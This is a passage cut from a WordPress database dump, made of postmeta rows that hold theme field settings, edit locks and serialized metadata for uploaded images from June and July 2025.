(1806,558,'title_style','default'),
(1807,558,'_title_style','field_5d1a0217cf408'),
(1808,558,'related',''),
(1809,558,'_related','field_603b51c3e183e'),
(1811,560,'_wp_attached_file','2025/06/EIT_QRCode-2.png'),
(1812,560,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:24:\"2025/06/EIT_QRCode-2.png\";s:8:\"filesize\";i:567;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"EIT_QRCode-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1744;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"EIT_QRCode-2-300x184.png\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1176;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1813,561,'title_style','default'),
(1814,561,'_title_style','field_5d1a0217cf408'),
(1816,563,'_wp_attached_file','2025/06/483858906_122214558428202781_582783627217107479_n.jpg'),
(1817,563,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:61:\"2025/06/483858906_122214558428202781_582783627217107479_n.jpg\";s:8:\"filesize\";i:226859;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"483858906_122214558428202781_582783627217107479_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18729;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"483858906_122214558428202781_582783627217107479_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120150;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"483858906_122214558428202781_582783627217107479_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8591;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"483858906_122214558428202781_582783627217107479_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77551;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"483858906_122214558428202781_582783627217107479_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:204575;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"483858906_122214558428202781_582783627217107479_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19356;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1818,564,'title_style','default'),
(1819,564,'_title_style','field_5d1a0217cf408'),
(1821,566,'_wp_attached_file','2025/06/483858906_122214558428202781_582783627217107479_n-1.jpg'),
(1822,566,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:63:\"2025/06/483858906_122214558428202781_582783627217107479_n-1.jpg\";s:8:\"filesize\";i:226859;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"483858906_122214558428202781_582783627217107479_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18729;}s:5:\"large\";a:5:{s:4:\"file\";s:64:\"483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120150;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"483858906_122214558428202781_582783627217107479_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8591;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"483858906_122214558428202781_582783627217107479_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77551;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:65:\"483858906_122214558428202781_582783627217107479_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:204575;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:63:\"483858906_122214558428202781_582783627217107479_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19356;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1823,567,'title_style','default'),
(1824,567,'_title_style','field_5d1a0217cf408'),
(1825,568,'title_style','default'),
(1826,568,'_title_style','field_5d1a0217cf408'),
(1827,569,'title_style','default'),
(1828,569,'_title_style','field_5d1a0217cf408'),
(1829,26,'_wp_old_date','2024-08-28'),
(1830,26,'_menu_sgpb_popup_id','0'),
(1831,35,'_wp_old_date','2024-08-28'),
(1832,35,'_menu_sgpb_popup_id','0'),
(1833,36,'_wp_old_date','2024-08-28'),
(1834,36,'_menu_sgpb_popup_id','0'),
(1835,37,'_wp_old_date','2024-08-28'),
(1836,37,'_menu_sgpb_popup_id','0'),
(1837,38,'_wp_old_date','2024-08-28'),
(1838,38,'_menu_sgpb_popup_id','0'),
(1839,39,'_wp_old_date','2024-08-28'),
(1840,39,'_menu_sgpb_popup_id','0'),
(1841,570,'title_style','default'),
(1842,570,'_title_style','field_5d1a0217cf408'),
(1844,572,'title_style','default'),
(1845,572,'_title_style','field_5d1a0217cf408'),
(1847,574,'_wp_attached_file','2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg'),
(1848,574,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1076;s:4:\"file\";s:64:\"2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\";s:8:\"filesize\";i:310973;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"508745932_122233182272202781_2147005512618392889_n-1-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15673;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"508745932_122233182272202781_2147005512618392889_n-1-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105629;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"508745932_122233182272202781_2147005512618392889_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7210;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"508745932_122233182272202781_2147005512618392889_n-1-768x404.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65085;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:65:\"508745932_122233182272202781_2147005512618392889_n-1-1536x807.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:807;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:186742;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"508745932_122233182272202781_2147005512618392889_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19254;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1849,575,'title_style','default'),
(1850,575,'_title_style','field_5d1a0217cf408'),
(1852,577,'title_style','default'),
(1853,577,'_title_style','field_5d1a0217cf408'),
(1854,578,'title_style','default'),
(1855,578,'_title_style','field_5d1a0217cf408'),
(1856,579,'title_style','default'),
(1857,579,'_title_style','field_5d1a0217cf408'),
(1858,580,'title_style','default'),
(1859,580,'_title_style','field_5d1a0217cf408'),
(1861,582,'title_style','default'),
(1862,582,'_title_style','field_5d1a0217cf408'),
(1863,583,'title_style','default'),
(1864,583,'_title_style','field_5d1a0217cf408'),
(1865,584,'title_style','default'),
(1866,584,'_title_style','field_5d1a0217cf408'),
(1867,585,'title_style','default'),
(1868,585,'_title_style','field_5d1a0217cf408'),
(1870,19,'footnotes',''),
(1871,587,'footnotes',''),
(1872,587,'title_style','default'),
(1873,587,'_title_style','field_5d1a0217cf408'),
(1874,588,'footnotes',''),
(1875,588,'title_style','default'),
(1876,588,'_title_style','field_5d1a0217cf408'),
(1878,590,'footnotes',''),
(1879,590,'title_style','default'),
(1880,590,'_title_style','field_5d1a0217cf408'),
(1881,592,'_edit_lock','1752462307:1'),
(1882,593,'_wp_attached_file','2025/07/514482723_122235641372202781_8363919214239008783_n.jpg'),
(1883,593,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1754;s:6:\"height\";i:1241;s:4:\"file\";s:62:\"2025/07/514482723_122235641372202781_8363919214239008783_n.jpg\";s:8:\"filesize\";i:1412994;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"514482723_122235641372202781_8363919214239008783_n-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13591;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"514482723_122235641372202781_8363919214239008783_n-1024x725.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110772;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"514482723_122235641372202781_8363919214239008783_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6173;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"514482723_122235641372202781_8363919214239008783_n-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67049;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"514482723_122235641372202781_8363919214239008783_n-1536x1087.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1087;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216385;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"514482723_122235641372202781_8363919214239008783_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12621;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1884,594,'_wp_attached_file','2025/07/514643366_122235641408202781_8568098940146373880_n.jpg'),
(1885,594,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1075;s:4:\"file\";s:62:\"2025/07/514643366_122235641408202781_8568098940146373880_n.jpg\";s:8:\"filesize\";i:560532;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"514643366_122235641408202781_8568098940146373880_n-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14603;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"514643366_122235641408202781_8568098940146373880_n-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115308;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"514643366_122235641408202781_8568098940146373880_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7202;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"514643366_122235641408202781_8568098940146373880_n-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70919;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"514643366_122235641408202781_8568098940146373880_n-1536x806.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:806;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:218360;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"514643366_122235641408202781_8568098940146373880_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18517;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1886,595,'_wp_attached_file','2025/07/514482723_122235641372202781_8363919214239008783_n-1.jpg'),
(1887,595,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1754;s:6:\"height\";i:1241;s:4:\"file\";s:64:\"2025/07/514482723_122235641372202781_8363919214239008783_n-1.jpg\";s:8:\"filesize\";i:1412994;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"514482723_122235641372202781_8363919214239008783_n-1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13591;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"514482723_122235641372202781_8363919214239008783_n-1-1024x725.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110772;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"514482723_122235641372202781_8363919214239008783_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6173;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"514482723_122235641372202781_8363919214239008783_n-1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67049;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"514482723_122235641372202781_8363919214239008783_n-1-1536x1087.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1087;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216385;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"514482723_122235641372202781_8363919214239008783_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12621;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1890,592,'_edit_last','1'),
(1891,592,'title_style','default'),
(1892,592,'_title_style','field_5d1a0217cf408'),
(1893,592,'related',''),
(1894,592,'_related','field_603b51c3e183e'),
(1895,596,'title_style','default'),
(1896,596,'_title_style','field_5d1a0217cf408'),
(1897,596,'related',''),
(1898,596,'_related','field_603b51c3e183e'),
(1903,592,'_thumbnail_id','594'),
(1912,597,'title_style','default'),
(1913,597,'_title_style','field_5d1a0217cf408'),
(1914,597,'related',''),
(1915,597,'_related','field_603b51c3e183e'),
(1916,598,'_edit_lock','1752482066:1'),
(1917,599,'_wp_attached_file','2025/07/517408980_122237076290202781_2399483217391122872_n.jpg'),
(1918,599,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:62:\"2025/07/517408980_122237076290202781_2399483217391122872_n.jpg\";s:8:\"filesize\";i:535489;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517408980_122237076290202781_2399483217391122872_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26202;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517408980_122237076290202781_2399483217391122872_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194476;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517408980_122237076290202781_2399483217391122872_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10804;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"517408980_122237076290202781_2399483217391122872_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212370;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"517408980_122237076290202781_2399483217391122872_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:349848;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517408980_122237076290202781_2399483217391122872_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25376;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1919,600,'_wp_attached_file','2025/07/516278598_122237076302202781_3530110155043035331_n.jpg'),
(1920,600,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:1108;s:4:\"file\";s:62:\"2025/07/516278598_122237076302202781_3530110155043035331_n.jpg\";s:8:\"filesize\";i:206576;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"516278598_122237076302202781_3530110155043035331_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20038;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"516278598_122237076302202781_3530110155043035331_n-1024x769.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:769;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124581;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"516278598_122237076302202781_3530110155043035331_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7923;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"516278598_122237076302202781_3530110155043035331_n-768x577.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82123;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"516278598_122237076302202781_3530110155043035331_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18419;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1921,601,'_wp_attached_file','2025/07/517173392_122237076476202781_570074520042229863_n.jpg'),
(1922,601,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:986;s:4:\"file\";s:61:\"2025/07/517173392_122237076476202781_570074520042229863_n.jpg\";s:8:\"filesize\";i:182639;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"517173392_122237076476202781_570074520042229863_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17164;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"517173392_122237076476202781_570074520042229863_n-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108545;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"517173392_122237076476202781_570074520042229863_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7614;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"517173392_122237076476202781_570074520042229863_n-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71453;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"517173392_122237076476202781_570074520042229863_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17672;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1923,602,'_wp_attached_file','2025/07/517721289_122237076404202781_2080327603048285591_n.jpg'),
(1924,602,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1392;s:6:\"height\";i:1108;s:4:\"file\";s:62:\"2025/07/517721289_122237076404202781_2080327603048285591_n.jpg\";s:8:\"filesize\";i:178662;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517721289_122237076404202781_2080327603048285591_n-300x239.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:239;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18611;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517721289_122237076404202781_2080327603048285591_n-1024x815.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:815;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114504;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517721289_122237076404202781_2080327603048285591_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7428;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517721289_122237076404202781_2080327603048285591_n-768x611.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:611;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75595;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517721289_122237076404202781_2080327603048285591_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17630;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1925,603,'_wp_attached_file','2025/07/517984456_122237076458202781_7761333788282518884_n.jpg'),
(1926,603,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1006;s:4:\"file\";s:62:\"2025/07/517984456_122237076458202781_7761333788282518884_n.jpg\";s:8:\"filesize\";i:209420;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517984456_122237076458202781_7761333788282518884_n-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19018;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517984456_122237076458202781_7761333788282518884_n-1024x697.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:697;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121925;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517984456_122237076458202781_7761333788282518884_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8352;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"517984456_122237076458202781_7761333788282518884_n-768x523.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:523;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79945;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"517984456_122237076458202781_7761333788282518884_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19582;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s